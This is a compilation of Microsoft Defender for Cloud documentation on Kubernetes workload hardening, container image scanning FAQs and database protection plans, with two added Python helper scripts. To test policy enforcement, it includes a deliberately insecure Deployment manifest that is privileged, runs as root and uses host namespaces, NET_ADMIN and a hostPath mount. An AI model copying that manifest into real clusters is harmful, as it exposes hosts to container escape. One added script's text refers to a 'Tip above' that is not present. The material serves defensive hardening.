Usage of host networking and ports should be restricted | Restrict unauthorized network access | Yes
Usage of pod HostPath volume mounts should be restricted to a known list | Manage access and permissions | Yes
Container with privilege escalation should be avoided | Manage access and permissions | No
Containers sharing sensitive host namespaces should be avoided | Manage access and permissions | No
Immutable (read-only) root filesystem should be enforced for containers | Manage access and permissions | No
Kubernetes clusters should be accessible only over HTTPS | Encrypt data in transit | No
Kubernetes clusters should disable automounting API credentials | Manage access and permissions | No
Kubernetes clusters should not use the default namespace | Implement security best practices | No
Kubernetes clusters should not grant CAP_SYS_ADMIN security capabilities | Manage access and permissions | No
Privileged containers should be avoided | Manage access and permissions | No
Running containers as root user should be avoided | Manage access and permissions | No

For recommendations with parameters that need to be customized, you need to set the parameters. To set the parameters:

1. Sign in to the Azure portal.


2. Navigate to Microsoft Defender for Cloud > Environment settings. 


3. Select the relevant subscription. 


4. From Defender for Cloud's menu, select Security policy. 


5. Select the relevant assignment. The default assignment is ASC default. 


6. Open the Parameters tab and modify the values as required. 


[Screenshot: Parameters tab showing the Containers should listen on allowed ports only parameter, with the effect options audit, deny and disabled]

7. Select Review + save. 


8. Select Save. 
To enforce any of the recommendations: 


1. Open the recommendation details page and select Deny: 


[Screenshot: Recommendation details for Container CPU and memory limits should be enforced, with the affected managed clusters listed under Unhealthy resources]

The pane to set the scope opens. 
2. Set the scope and select Change to deny. 
To see which recommendations apply to your clusters: 


1. Open Defender for Cloud's asset inventory page and set the resource type filter to 
Kubernetes services. 


2. Select a cluster to investigate and review the recommendations available for it.

When you view a recommendation from the workload protection set, the number of affected pods ("Kubernetes components") is listed alongside the cluster. For a list of the specific pods, select the cluster and then select Take action.


[Screenshot: Kubernetes service security health page for a cluster, listing each recommendation with its Kubernetes components count, effect (Audit or Deny) and severity]


To test the enforcement, use the two Kubernetes deployments below: 


- One is for a healthy deployment, compliant with the bundle of workload protection recommendations.
- The other is for an unhealthy deployment, noncompliant with any of the recommendations.


Deploy the example .yaml files as-is, or use them as a reference to remediate your own 
workload. 


Healthy deployment example .yaml file 


yml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: redis-healthy-deployment
  labels:
    app: redis
spec:
  replicas: 3
  selector:
    matchLabels:
      app: redis
  template:
    metadata:
      labels:
        app: redis
      annotations:
        container.apparmor.security.beta.kubernetes.io/redis: runtime/default
    spec:
      containers:
      - name: redis
        image: <customer-registry>.azurecr.io/redis:latest
        ports:
        - containerPort: 80
        resources:
          limits:
            cpu: 100m
            memory: 250Mi
        securityContext:
          privileged: false
          readOnlyRootFilesystem: true
          allowPrivilegeEscalation: false
          runAsNonRoot: true
          runAsUser: 1000
---
apiVersion: v1
kind: Service
metadata:
  name: redis-healthy-service
spec:
  type: LoadBalancer
  selector:
    app: redis
  ports:
  - port: 80
    targetPort: 80


Unhealthy deployment example .yaml file 


yml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: redis-unhealthy-deployment
  labels:
    app: redis
spec:
  replicas: 3
  selector:
    matchLabels:
      app: redis
  template:
    metadata:
      labels:
        app: redis
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: redis
        image: redis:latest
        ports:
        - containerPort: 9001
          hostPort: 9001
        securityContext:
          privileged: true
          readOnlyRootFilesystem: false
          allowPrivilegeEscalation: true
          runAsUser: 0
          capabilities:
            add:
            - NET_ADMIN
        volumeMounts:
        - mountPath: /test-pd
          name: test-volume
          readOnly: true
      volumes:
      - name: test-volume
        hostPath:
          # directory location on host
          path: /tmp
---
apiVersion: v1
kind: Service
metadata:
  name: redis-unhealthy-service
spec:
  type: LoadBalancer
  selector:
    app: redis
  ports:
  - port: 6001
    targetPort: 9001
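As an added example (not Microsoft's code), the script below performs a local pre-flight check of a Deployment's pod template against the hardening recommendations in the table above, so you can see why a workload would show as unhealthy before the Azure Policy add-on reports it. HEALTHY and UNHEALTHY are hand-built dicts mirroring the two YAML Deployments above (the Services are omitted); the allowed-value parameters (trusted registries, allowed ports, AppArmor profiles, host paths, capabilities) are assumptions standing in for the Azure Policy parameters you set in the portal.

```python
# Added example (not Microsoft's code): checks a Deployment's pod template
# against the data plane hardening bundle listed above. HEALTHY and UNHEALTHY
# are hand-built dicts mirroring the page's two YAML examples (Deployment
# only); the allowed-value parameters below are assumptions standing in for
# the Azure Policy parameters you set in the portal.

TRUSTED_REGISTRIES = {"<customer-registry>.azurecr.io"}  # assumed trusted list
ALLOWED_PORTS = {80}                                     # assumed allowed ports
ALLOWED_APPARMOR = {"runtime/default"}                   # assumed profiles
ALLOWED_HOST_PATHS = set()                               # assumed: none allowed
ALLOWED_CAPABILITIES = set()                             # assumed: none allowed

HEALTHY = {"spec": {"template": {
    "metadata": {"labels": {"app": "redis"}, "annotations": {
        "container.apparmor.security.beta.kubernetes.io/redis": "runtime/default"}},
    "spec": {"containers": [{
        "name": "redis",
        "image": "<customer-registry>.azurecr.io/redis:latest",
        "ports": [{"containerPort": 80}],
        "resources": {"limits": {"cpu": "100m", "memory": "250Mi"}},
        "securityContext": {"privileged": False, "readOnlyRootFilesystem": True,
                            "allowPrivilegeEscalation": False,
                            "runAsNonRoot": True, "runAsUser": 1000}}]}}}}

UNHEALTHY = {"spec": {"template": {
    "metadata": {"labels": {"app": "redis"}},
    "spec": {"hostNetwork": True, "hostPID": True, "hostIPC": True,
             "containers": [{
                 "name": "redis", "image": "redis:latest",
                 "ports": [{"containerPort": 9001, "hostPort": 9001}],
                 "securityContext": {"privileged": True,
                                     "readOnlyRootFilesystem": False,
                                     "allowPrivilegeEscalation": True,
                                     "runAsUser": 0,
                                     "capabilities": {"add": ["NET_ADMIN"]}},
                 "volumeMounts": [{"mountPath": "/test-pd", "name": "test-volume",
                                   "readOnly": True}]}],
             "volumes": [{"name": "test-volume", "hostPath": {"path": "/tmp"}}]}}}}


def _registry(image):
    """Registry host of an image reference; '' means the default (Docker Hub)."""
    first = image.split("/", 1)[0]
    return first if "/" in image and ("." in first or ":" in first) else ""


def check_deployment(dep, trusted_registries=TRUSTED_REGISTRIES,
                     allowed_ports=ALLOWED_PORTS, allowed_apparmor=ALLOWED_APPARMOR,
                     allowed_host_paths=ALLOWED_HOST_PATHS,
                     allowed_capabilities=ALLOWED_CAPABILITIES):
    """Return the sorted, de-duplicated recommendation names that the pod
    template of a Deployment violates."""
    template = dep["spec"]["template"]
    pod = template["spec"]
    annotations = template.get("metadata", {}).get("annotations", {})
    hits = set()
    if pod.get("hostPID") or pod.get("hostIPC"):
        hits.add("Containers sharing sensitive host namespaces should be avoided")
    if pod.get("hostNetwork"):
        hits.add("Usage of host networking and ports should be restricted")
    for vol in pod.get("volumes", []):
        if "hostPath" in vol and vol["hostPath"].get("path") not in allowed_host_paths:
            hits.add("Usage of pod HostPath volume mounts should be restricted to a known list")
    for c in pod.get("containers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            hits.add("Privileged containers should be avoided")
        if sc.get("allowPrivilegeEscalation", True):  # must be explicitly false
            hits.add("Container with privilege escalation should be avoided")
        if not sc.get("readOnlyRootFilesystem"):
            hits.add("Immutable (read-only) root filesystem should be enforced for containers")
        uid = sc.get("runAsUser")
        if uid == 0 or (uid is None and not sc.get("runAsNonRoot")):
            hits.add("Running containers as root user should be avoided")
        added = set(sc.get("capabilities", {}).get("add", []))
        if added - allowed_capabilities:
            hits.add("Least privileged Linux capabilities should be enforced for containers")
        if "SYS_ADMIN" in added:
            hits.add("Kubernetes clusters should not grant CAP_SYS_ADMIN security capabilities")
        limits = c.get("resources", {}).get("limits", {})
        if "cpu" not in limits or "memory" not in limits:
            hits.add("Container CPU and memory limits should be enforced")
        if _registry(c["image"]) not in trusted_registries:
            hits.add("Container images should be deployed only from trusted registries")
        for p in c.get("ports", []):
            if "hostPort" in p:
                hits.add("Usage of host networking and ports should be restricted")
            if p.get("containerPort") not in allowed_ports:
                hits.add("Containers should listen on allowed ports only")
        key = "container.apparmor.security.beta.kubernetes.io/" + c["name"]
        if annotations.get(key) not in allowed_apparmor:
            hits.add("Containers should only use allowed AppArmor profiles")
    return sorted(hits)
```

Passing a different allowed_ports value to check_deployment shows the effect the Tip above describes: the healthy Deployment is reported as unhealthy for "allowed ports" as soon as the parameter no longer includes port 80.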


Next steps 


In this article, you learned how to configure Kubernetes data plane hardening. 


For related material, see the following pages: 


- Defender for Cloud recommendations for compute
- Alerts for AKS cluster level


Common questions about 
Defender for Containers 


FAQ 


Get answers to common questions about Microsoft Defender for Containers. 


What are the options to enable the new 
plan at scale? 


You can use the Azure Policy Configure Microsoft Defender for Containers to be enabled, to enable Defender for Containers at scale. You can also see all of the options that are available to enable Microsoft Defender for Containers.


Does Microsoft Defender for Containers 
support AKS clusters with virtual 
machines scale sets? 


Yes. 


Does Microsoft Defender for Containers 
support AKS without scale set (default)? 


No. Only Azure Kubernetes Service (AKS) clusters that use Virtual Machine Scale Sets for the nodes are supported.


Do I need to install the Log Analytics VM extension on my AKS nodes for security protection?


No, AKS is a managed service, and manipulation of the IaaS resources isn't supported. The Log Analytics VM extension isn't needed and may result in extra charges.


How can I use my existing Log Analytics 
workspace? 


You can use your existing Log Analytics workspace by following the steps in the Assign a custom workspace section of this article.


Can I delete the default workspaces created by Defender for Cloud?


We don't recommend deleting the default workspace. Defender for Containers uses the default workspaces to collect security data from your clusters. If you delete the default workspace, Defender for Containers will be unable to collect data, and some security recommendations and alerts will become unavailable.


I deleted my default workspace, how can I get it back?


To recover your default workspace, you need to remove the Defender agent, and 
reinstall the agent. Reinstalling the Defender agent creates a new default workspace. 


Where is the default Log Analytics workspace located?


The location of the default Log Analytics workspace depends on your region. To check your region, see Where is the default Log Analytics workspace created?


My organization requires me to tag my resources, and the required agent didn't get installed, what went wrong?


The Defender agent uses the Log Analytics workspace to send data from your Kubernetes clusters to Defender for Cloud. Defender for Cloud adds the Log Analytics workspace and the resource group as parameters for the agent to use.


However, if your organization has a policy that requires a specific tag on your resources, 
it may cause the agent installation to fail during the resource group or the default 
workspace creation stage. If it fails, you can either: 


• Assign a custom workspace and add any tag your organization requires.

or

• If your company requires you to tag your resource, you should navigate to that policy and exclude the following resources:


1. The resource group DefaultResourceGroup-<RegionShortCode> 


2. The Workspace DefaultWorkspace-<sub-id>-<RegionShortCode> 


RegionShortCode is a 2-4 letter string.


How does Defender for Containers scan an image?


Defender for Containers pulls the image from the registry and runs it in an isolated 
sandbox with the Qualys scanner. The scanner extracts a list of known vulnerabilities. 


Defender for Cloud filters and classifies findings from the scanner. When an image is healthy, Defender for Cloud marks it as such. Defender for Cloud generates security recommendations only for images that have issues to be resolved. By only notifying you when there are problems, Defender for Cloud reduces the potential for unwanted informational alerts.


How can I identify pull events performed by the scanner?


To identify pull events performed by the scanner, do the following steps: 


1. Search for pull events with the UserAgent of AzureContainerImageScanner.
2. Extract the identity associated with this event. 
3. Use the extracted identity to identify pull events from the scanner. 
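The three steps above, as an added Python example that is not part of the article; the event records and their field names are constructed to illustrate the logic, not the exact schema of ACR logs:

```python
"""Separate image-scanner pulls from other pulls in registry events (added
example, not from the article). Follows the three steps above over constructed
records; the field names are assumptions, not the exact schema of ACR
diagnostic logs."""
from typing import Dict, Iterable, List, Set, Tuple

SCANNER_USER_AGENT = "AzureContainerImageScanner"  # UserAgent named in the FAQ

# Constructed sample events; identities, repositories and times are made up.
SAMPLE_EVENTS: List[Dict] = [
    {"time": "2023-06-01T08:00:01Z", "operation": "Pull", "repository": "app/api",
     "tag": "1.4.2", "identity": "<scanner-object-id>",
     "userAgent": "AzureContainerImageScanner/1.0"},
    # Same identity, but the UserAgent alone would not reveal it as the scanner.
    {"time": "2023-06-01T08:00:07Z", "operation": "Pull", "repository": "app/web",
     "tag": "2.0.0", "identity": "<scanner-object-id>",
     "userAgent": "docker/24.0.2 go/go1.20"},
    {"time": "2023-06-01T09:12:44Z", "operation": "Pull", "repository": "app/api",
     "tag": "1.4.2", "identity": "developer@example.test",
     "userAgent": "docker/24.0.2 go/go1.20"},
    {"time": "2023-06-01T09:13:00Z", "operation": "Push", "repository": "app/api",
     "tag": "1.4.3", "identity": "ci-pipeline-sp", "userAgent": "oras/1.0.0"},
]


def scanner_identities(events: Iterable[Dict],
                       user_agent: str = SCANNER_USER_AGENT) -> Set[str]:
    """Steps 1 and 2: find pulls whose UserAgent names the scanner, and collect
    the identity recorded on those events."""
    return {e["identity"] for e in events
            if e.get("operation") == "Pull" and user_agent in e.get("userAgent", "")}


def split_pull_events(events: Iterable[Dict],
                      user_agent: str = SCANNER_USER_AGENT) -> Tuple[List[Dict], List[Dict]]:
    """Step 3: attribute every pull by identity rather than by UserAgent.
    Returns (scanner_pulls, other_pulls); the second list is the one to review
    when investigating who is pulling images from the registry."""
    events = list(events)
    ids = scanner_identities(events, user_agent)
    pulls = [e for e in events if e.get("operation") == "Pull"]
    scanner = [e for e in pulls if e["identity"] in ids]
    other = [e for e in pulls if e["identity"] not in ids]
    return scanner, other


def pulls_by_repository(events: Iterable[Dict]) -> Dict[str, int]:
    """Count pulls per repository; run it on the non-scanner list to see pull
    volume without the scanner's weekly rescans inflating the numbers."""
    counts: Dict[str, int] = {}
    for e in events:
        if e.get("operation") == "Pull":
            counts[e["repository"]] = counts.get(e["repository"], 0) + 1
    return counts


if __name__ == "__main__":
    scanner, other = split_pull_events(SAMPLE_EVENTS)
    print(f"scanner identities: {scanner_identities(SAMPLE_EVENTS)}")
    print(f"{len(scanner)} scanner pulls, {len(other)} other pulls")
    print("pulls by repository (excluding scanner):", pulls_by_repository(other))
```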


What is the difference between Not Applicable Resources and Unverified Resources?


• Not applicable resources are resources for which the recommendation can't give a definitive answer. The not applicable tab includes reasons for each resource that could not be assessed.

• Unverified resources are resources that have been scheduled to be assessed, but have not been assessed yet.


Does Microsoft share any information with Qualys in order to perform image scans?


No, the Qualys scanner is hosted by Microsoft, and no customer data is shared with 
Qualys. 


Why is Defender for Cloud alerting me to vulnerabilities about an image that isn't in my registry?


Some images may reuse tags from an image that was already scanned. For example, you 
may reassign the tag “Latest” every time you add an image to a digest. In such cases, the 
‘old’ image does still exist in the registry and may still be pulled by its digest. If the 
image has security findings and is pulled, it will expose security vulnerabilities. 


Does Defender for Containers scan images in Microsoft Container Registry?


Currently, Defender for Containers can scan images in Azure Container Registry (ACR) 
and AWS Elastic Container Registry (ECR) only. Docker Registry, Microsoft Artifact 
Registry/Microsoft Container Registry, and Microsoft Azure Red Hat OpenShift (ARO) 
built-in container image registry are not supported. Images should first be imported to 
ACR. Learn more about importing container images to an Azure container registry. 


Can I get the scan results via REST API?


Yes. The results are under Sub-Assessments REST API. Also, you can use Azure Resource 
Graph (ARG), the Kusto-like API for all of your resources: a query can fetch a specific 
scan. 


How do I check which media type my containers are using?


To check an image type, you need to use a tool that can check the raw image manifest, such as skopeo, and inspect the raw image format.


• For the Docker v2 format, the manifest media type would be application/vnd.docker.distribution.manifest.v1+json or application/vnd.docker.distribution.manifest.v2+json, as documented here.

• For the OCI image format, the manifest media type would be application/vnd.oci.image.manifest.v1+json, and config media type application/vnd.oci.image.config.v1+json, as documented here.


What's the agentless discovery for Kubernetes refresh interval?


Agentless information in Defender for Containers is updated through a snapshot 
mechanism. It can take up to 6 hours to see results in cloud security explorer. 


Next steps 


Learn about Defender for Containers 


Introduction to Microsoft Defender for Kubernetes (deprecated)


Article • 06/14/2023


Defender for Cloud provides real-time threat protection for your Azure Kubernetes Service (AKS) containerized environments and generates alerts for suspicious activities. You can use this information to quickly remediate security issues and improve the security of your containers.


Threat protection at the cluster level is provided by the analysis of the Kubernetes audit logs. Host-level threat detection for your Linux AKS nodes is available if you enable Microsoft Defender for Servers and its Log Analytics agent. However, if your cluster is deployed on an Azure Kubernetes Service virtual machine scale set, the Log Analytics agent isn't currently supported.


Availability 


Important


Microsoft Defender for Kubernetes has been replaced with Microsoft Defender for Containers. If you've already enabled Defender for Kubernetes on a subscription, you can continue to use it. However, you won't get Defender for Containers' improvements and new features.

This plan is no longer available for subscriptions where it isn't already enabled.


To upgrade to Microsoft Defender for Containers, open the Defender plans page in the portal and enable the new plan:


[Screenshot: Defender plans page showing the Kubernetes (deprecated) and Container registries (deprecated) plans, each marked "Update available".]


Learn more about this change in the release note. 


Aspect: Details

Release state: Deprecated (Use Microsoft Defender for Containers)

Required roles and permissions: Security admin can dismiss alerts. Security reader can view findings.

Clouds: ✔ Commercial clouds; ✔ National (Azure Government, Azure China 21Vianet)


What are the benefits of Microsoft Defender for Kubernetes?


Our global team of security researchers constantly monitors the threat landscape. As container-specific alerts and vulnerabilities are discovered, these researchers add them to our threat intelligence feeds, and Defender for Cloud alerts you to any that are relevant to your environment.


In addition, Microsoft Defender for Kubernetes provides cluster-level threat protection 
by monitoring your clusters' logs. This means that security alerts are only triggered for 
actions and deployments that occur after you've enabled Defender for Kubernetes on 
your subscription. 


Examples of security events that Microsoft Defender for Kubernetes monitors include:


• Exposed Kubernetes dashboards
• Creation of high privileged roles
• Creation of sensitive mounts


For a full list of the cluster level alerts, see alerts with "K8S_" prefix in the alert type in the 
reference table of alerts. 


FAQ - Microsoft Defender for Kubernetes 


• What happens to subscriptions with Microsoft Defender for Kubernetes or Microsoft Defender for Containers enabled?

• Is Defender for Containers a mandatory upgrade?

• How can I calculate my potential price change?


What happens to subscriptions with Microsoft Defender for Kubernetes or Microsoft Defender for Containers enabled?


Subscriptions that already have one of these plans enabled can continue to benefit from it.

If you haven't enabled them yet, or you create a new subscription, these plans can no longer be enabled.


Is Defender for Containers a mandatory upgrade? 


No. Subscriptions that have either Microsoft Defender for Kubernetes or Microsoft Defender for container registries enabled don't need to be upgraded to the new Microsoft Defender for Containers plan. However, they won't benefit from the new and improved capabilities, and they'll have an upgrade icon shown alongside them in the Azure portal.


How can I calculate my potential price change?


In order to help you understand your costs, Defender for Cloud offers the Price 
Estimation workbook as part of its published Workbooks. The Price Estimation workbook 
allows you to estimate the expected price for Defender for Cloud plans before enabling 
them. 


Your price is dependent on your container architecture and coverage. Learn how to enable and use the Price Estimation workbook.


Next steps 


In this article, you learned about Kubernetes protection in Defender for Cloud, including 
Microsoft Defender for Kubernetes. 


Enable enhanced protections 


For related material, see the following articles: 


• Stream alerts to a SIEM, SOAR, or IT Service Management solution
• Reference table of alerts


Introduction to Microsoft Defender for container registries (deprecated)


Article • 06/18/2023


Azure Container Registry (ACR) is a managed, private Docker registry service that stores 
and manages your container images for Azure deployments in a central registry. It's 
based on the open-source Docker Registry 2.0. 


To protect the Azure Resource Manager based registries in your subscription, enable 
Microsoft Defender for container registries at the subscription level. Defender for 
Cloud will then scan all images when they're pushed to the registry, imported into the 
registry, or pulled within the last 30 days. You'll be charged for every image that gets 
scanned — once per image. 


Availability 


Important


Microsoft Defender for container registries has been replaced with Microsoft 
Defender for Containers. If you've already enabled Defender for container 
registries on a subscription, you can continue to use it. However, you won't get 
Defender for Containers’ improvements and new features. 


This plan is no longer available for subscriptions where it isn't already enabled. 


To upgrade to Microsoft Defender for Containers, open the Defender plans page in 
the portal and enable the new plan: 


[Screenshot: Defender plans page showing the Kubernetes (deprecated) and Container registries (deprecated) plans, each marked "Update available".]


Learn more about this change in the release note. 


Aspect: Details

Release state: Deprecated (Use Microsoft Defender for Containers)

Supported registries and images:
• Linux images in ACR registries accessible from the public internet with shell access
• ACR registries protected with Azure Private Link

Unsupported registries and images:
• Windows images
• 'Private' registries (unless access is granted to Trusted Services)
• Super-minimalist images such as Docker scratch images, or "Distroless" images that only contain an application and its runtime dependencies without a package manager, shell, or OS
• Images with Open Container Initiative (OCI) Image Format Specification

Required roles and permissions: Security reader and Azure Container Registry roles and permissions

Clouds: ✔ Commercial clouds; ✔ National (Azure Government, Azure China 21Vianet)


What are the benefits of Microsoft Defender for container registries?


Defender for Cloud identifies Azure Resource Manager based ACR registries in your subscription and seamlessly provides Azure-native vulnerability assessment and management for your registry's images.


Microsoft Defender for container registries includes a vulnerability scanner to scan the 
images in your Azure Resource Manager-based Azure Container Registry registries and 
provide deeper visibility into your images' vulnerabilities. The integrated scanner is 
powered by Qualys, the industry-leading vulnerability scanning vendor. 


When issues are found — by Qualys or Defender for Cloud — you'll get notified in the 
workload protection dashboard. For every vulnerability, Defender for Cloud provides 
actionable recommendations, along with a severity classification, and guidance for how 
to remediate the issue. For details of Defender for Cloud's recommendations for 
containers, see the reference list of recommendations. 


Defender for Cloud filters and classifies findings from the scanner. When an image is 
healthy, Defender for Cloud marks it as such. Defender for Cloud generates security 
recommendations only for images that have issues to be resolved. Defender for Cloud 
provides details of each reported vulnerability and a severity classification. Additionally, 
it gives guidance for how to remediate the specific vulnerabilities found on each image. 


By only notifying when there are problems, Defender for Cloud reduces the potential for unwanted informational alerts.


When are images scanned? 


There are three triggers for an image scan: 


• On push - Whenever an image is pushed to your registry, Defender for container registries automatically scans that image. To trigger the scan of an image, push it to your repository.

• Recently pulled - Since new vulnerabilities are discovered every day, Microsoft Defender for container registries also scans, on a weekly basis, any image that has been pulled within the last 30 days. There's no additional charge for these rescans; as mentioned above, you're billed once per image.

• On import - Azure Container Registry has import tools to bring images to your registry from Docker Hub, Microsoft Container Registry, or another Azure container registry. Microsoft Defender for container registries scans any supported images you import. Learn more in Import container images to a container registry.


The scan completes typically within 2 minutes, but it might take up to 40 minutes. 


Findings are made available as security recommendations such as this one: 


Container registry images should have vulnerability findings resolved 


[Screenshot: recommendation details page with Exempt, Disable rule, View policy definition and Open query actions; a summary of unhealthy registries and vulnerabilities by severity; and a Security Checks list of findings, each with an ID, category, number of affected scanned images, severity and patch availability, expanding to a description, CVSS score, CVEs, remediation links and the affected image digests and repositories.]


How does Defender for Cloud work with Azure Container Registry?


Below is a high-level diagram of the components and benefits of protecting your registries with Defender for Cloud.

[Diagram: container images are pushed to Azure Container Registry instances in an Azure region; Microsoft Defender for Cloud runs vulnerability scanning (Qualys) on them and produces discovery of vulnerable ACR container images, actionable recommendations, and vulnerability details with severity classification.]


FAQ - Azure Container Registry image scanning 


How does Defender for Cloud scan an image? 


Defender for Cloud pulls the image from the registry and runs it in an isolated sandbox 
with the Qualys scanner. The scanner extracts a list of known vulnerabilities. 


Defender for Cloud filters and classifies findings from the scanner. When an image is healthy, Defender for Cloud marks it as such. Defender for Cloud generates security recommendations only for images that have issues to be resolved. By only notifying you when there are problems, Defender for Cloud reduces the potential for unwanted informational alerts.


Can I get the scan results via REST API? 


Yes. The results are under Sub-Assessments REST API. Also, you can use Azure Resource 
Graph (ARG), the Kusto-like API for all of your resources: a query can fetch a specific 
scan. 


What registry types are scanned? What types are billed? 


For a list of the types of container registries supported by Microsoft Defender for 
container registries, see Availability. 


If you connect unsupported registries to your Azure subscription, Defender for Cloud 
won't scan them and won't bill you for them. 


Can I customize the findings from the vulnerability scanner?


Yes. If you have an organizational need to ignore a finding, rather than remediate it, you can optionally disable it. Disabled findings don't impact your secure score or generate unwanted noise.


Learn about creating rules to disable findings from the integrated vulnerability 
assessment tool. 


Why is Defender for Cloud alerting me to vulnerabilities about an image that isn't in my registry?


Defender for Cloud provides vulnerability assessments for every image pushed or pulled 
in a registry. Some images may reuse tags from an image that was already scanned. For 
example, you may reassign the tag “Latest” every time you add an image to a digest. In 
such cases, the ‘old’ image does still exist in the registry and may still be pulled by its 
digest. If the image has security findings and is pulled, it'll expose security 
vulnerabilities. 


Next steps 


Scan your images for vulnerabilities 


Protect your databases with Defender for Databases


Article • 06/29/2023


Defender for Databases in Microsoft Defender for Cloud allows you to protect your 
entire database estate with attack detection and threat response for the most popular 
database types in Azure. Defender for Cloud provides protection for the database 
engines and for data types, according to their attack surface and security risks. 


Database protection includes: 


• Microsoft Defender for Azure SQL databases
• Microsoft Defender for SQL servers on machines
• Microsoft Defender for open-source relational databases
• Microsoft Defender for Azure Cosmos DB


These four database protection plans are priced separately. Get more info about Defender for Cloud's pricing on the pricing page.


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.

• You must enable Microsoft Defender for Cloud on your Azure subscription.

• Connect your non-Azure machines, AWS account or GCP projects.


Enable the Databases plan 


When you enable database protection, you enable all four of the Defender plans and 
protect all of the supported databases on your subscription. 


To enable Defender for Databases on your subscription:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the relevant Azure subscription, AWS account or GCP project.
5. On the Defender plans page, toggle the Databases plan to On.
Enable specific database protections


When you enable database protection, you enable the following four Defender plans: 


• Defender for Azure SQL databases
• Defender for SQL server on machines
• Defender for open-source relational databases
• Defender for Azure Cosmos DB


These plans protect all of the supported databases in your subscription.

To enable specific database protections on your subscription:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the relevant subscription.
5. On the Defender plans page, locate the Databases plan and select Select types.


[Screenshot: Environment settings > Defender plans page, showing the Cloud Security Posture Management (CSPM) and Cloud Workload Protection (CWP) plan sections with Pricing, Resource quantity and Monitoring coverage columns. The page notes that selecting Save enables the enhanced security features on the selected resource types, that the first 30 days are free, and that pricing details are on the pricing page.]


6. In the Resource types selection window, toggle the desired plans to On or Off. 


[Screenshot: Resource types selection pane listing Azure SQL Databases, SQL servers on machines, Open-source relational databases, and Azure Cosmos DB, each with an On/Off toggle, pricing, and resource quantity.]


7. (Optional) Exclude specific database resource types by toggling them to Off. 
8. Select Continue. 


9. Select Save. 


Next steps 


Overview of Microsoft Defender for Azure SQL 


Microsoft Defender for SQL servers on machines 


Overview of Microsoft Defender for open-source relational databases 


Overview of Microsoft Defender for Azure Cosmos DB 


Overview of Microsoft Defender for Azure SQL


Microsoft Defender for Azure SQL helps you discover and mitigate potential database
vulnerabilities and alerts you to anomalous activities that may be an indication of a 
threat to your databases. 


• Vulnerability assessment: Scan databases to discover, track, and remediate vulnerabilities. Learn more about vulnerability assessment.

• Threat protection: Receive detailed security alerts and recommended actions based on SQL Advanced Threat Protection to help you mitigate threats. Learn more about SQL Advanced Threat Protection.


When you enable Microsoft Defender for Azure SQL, all supported resources that exist 
within the subscription are protected. Future resources created on the same subscription 
will also be protected. 


Availability 


Aspect: Details

Release state: Generally available (GA)

Pricing: Microsoft Defender for Azure SQL is billed as shown on the pricing page

Protected SQL versions: Read-write replicas of:
• Azure SQL single databases and elastic pools
• Azure SQL Managed Instance
• Azure Synapse Analytics (formerly SQL DW) dedicated SQL pool

Clouds:
• ✔ Commercial clouds
• ✔ Azure Government
• ✔ Azure China 21Vianet (Partial: Subset of alerts and vulnerability assessment for SQL servers. Behavioral threat protections aren't available.)


What are the benefits of Microsoft Defender for Azure SQL?


Discover and mitigate vulnerabilities 


A vulnerability assessment service discovers, tracks, and helps you remediate potential database vulnerabilities. Assessment scans provide an overview of your SQL machines' security state, and details of any security findings. Defender for Azure SQL helps you identify and mitigate potential database vulnerabilities and detect anomalous activities that could indicate threats to your databases.


Learn more about vulnerability assessment for Azure SQL Database. 


Advanced threat protection 


An advanced threat protection service continuously monitors your SQL servers for threats such as SQL injection, brute-force attacks, and privilege abuse. This service provides action-oriented security alerts in Microsoft Defender for Cloud with details of the suspicious activity, guidance on how to mitigate the threats, and options for continuing your investigations with Microsoft Sentinel. Learn more about advanced threat protection.


Threat intelligence enriched security alerts are triggered when there's: 


• Potential SQL injection attacks - including vulnerabilities detected when applications generate a faulty SQL statement in the database

• Anomalous database access and query patterns - for example, an abnormally high number of failed sign-in attempts with different credentials (a brute force attempt)

• Suspicious database activity - for example, a legitimate user accessing an SQL Server from a breached computer which communicated with a crypto-mining C&C server


Alerts include details of the incident that triggered them, as well as recommendations 
on how to investigate and remediate threats. Learn more about the security alerts for 
SQL servers. 


Next steps 


In this article, you learned about Microsoft Defender for Azure SQL. Now you can: 


• Enable Microsoft Defender for Azure SQL
• How Microsoft Defender for Azure SQL can protect SQL servers anywhere.
• Set up email notifications for security alerts


SQL vulnerability assessment helps you identify database vulnerabilities


SQL vulnerability assessment is an easy-to-configure service that can discover, track, and
help you remediate potential database vulnerabilities. Use it to proactively improve your 
database security for: 


• Azure SQL Database
• Azure SQL Managed Instance
• Azure Synapse Analytics


Vulnerability assessment is part of Microsoft Defender for Azure SQL, which is a unified 
package for advanced SQL security capabilities. Vulnerability assessment can be 
accessed and managed from each SQL database resource in the Azure portal. 


Note


Vulnerability assessment is supported for Azure SQL Database, Azure SQL Managed 
Instance, and Azure Synapse Analytics. Databases in Azure SQL Database, Azure 
SQL Managed Instance, and Azure Synapse Analytics are referred to collectively in 
the remainder of this article as databases, and the server is referring to the server 
that hosts databases for Azure SQL Database and Azure Synapse. 


What is SQL vulnerability assessment? 


SQL vulnerability assessment is a service that provides visibility into your security state. 
Vulnerability assessment includes actionable steps to resolve security issues and 
enhance your database security. It can help you to monitor a dynamic database 
environment where changes are difficult to track and improve your SQL security posture. 


Vulnerability assessment is a scanning service built into Azure SQL Database. The service 
employs a knowledge base of rules that flag security vulnerabilities. It highlights 
deviations from best practices, such as misconfigurations, excessive permissions, and 
unprotected sensitive data. 


The rules are based on Microsoft's best practices and focus on the security issues that present the biggest risks to your database and its valuable data. They cover database-level issues and server-level security issues, like server firewall settings and server-level permissions.


Results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable. You can customize an assessment report for your environment by setting an acceptable baseline for:

• Permission configurations
• Feature configurations
• Database settings


What are the express and classic configurations?


You can configure vulnerability assessment for your SQL databases with either: 


• Express configuration — The default procedure that lets you configure vulnerability assessment without dependency on external storage to store baseline and scan result data.

• Classic configuration — The legacy procedure that requires you to manage an Azure storage account to store baseline and scan result data.


What's the difference between the express and classic configuration?


Configuration modes benefits and limitations comparison:

Parameter: Supported SQL Flavors
  Express configuration: Azure SQL Database; Azure Synapse Dedicated SQL Pools (formerly SQL DW)
